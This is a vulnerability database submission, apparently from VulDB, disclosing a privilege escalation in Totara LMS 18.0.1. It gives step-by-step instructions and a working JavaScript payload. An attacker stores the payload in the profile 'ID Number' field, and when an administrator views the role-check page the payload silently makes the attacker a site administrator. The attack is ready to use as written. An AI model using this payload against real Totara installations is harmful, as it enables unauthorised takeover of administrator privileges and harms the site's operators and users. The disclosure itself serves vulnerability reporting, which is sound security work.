| Title | Totara Totara LMS Totara 18.0.1 (Build: 20231128.01) Privileges Scalation |
|---|
| Description | # Exploit Title: CSRF Privileges Scalation Totara 18.0.1
# Date: 2024-04-10
# Author: Patricio Alejandro Moraga Abarca (RREEDD) and Juan Carlos Garcés Bernt (DeBobiPro)
# Category : webapps
# Tested on: Totara 18.0.1 (Build: 20231128.01)
# Proof Of Concept:
1. In your user profile modify the "ID Number" variable by entering the payload.
2. The payload will be executed by the administrator when visiting the site "admin/roles/check.php", making the profile defined in the administrator payload.
# Payload
<script>const http = new XMLHttpRequest(); http.open("POST", "/admin/roles/admins.php", false); http.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); http.send("confirmadd=<USER ID>&sesskey="+M.cfg.sesskey);</script>
#The <USER ID> field must be modified by the value of your user.
#The variable "sesskey", is unique to each login, so we get it dynamically with the call to the object "M.cfg.sesskey". |
|---|
| User | Anonymous User |
|---|
| Submission | 04/10/2024 19:35 (2 years ago) |
|---|
| Moderation | 04/17/2024 18:58 (7 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 261369 [Totara LMS up to 18.7 User Selector cross-site request forgery] |
|---|
| Points | 17 |
|---|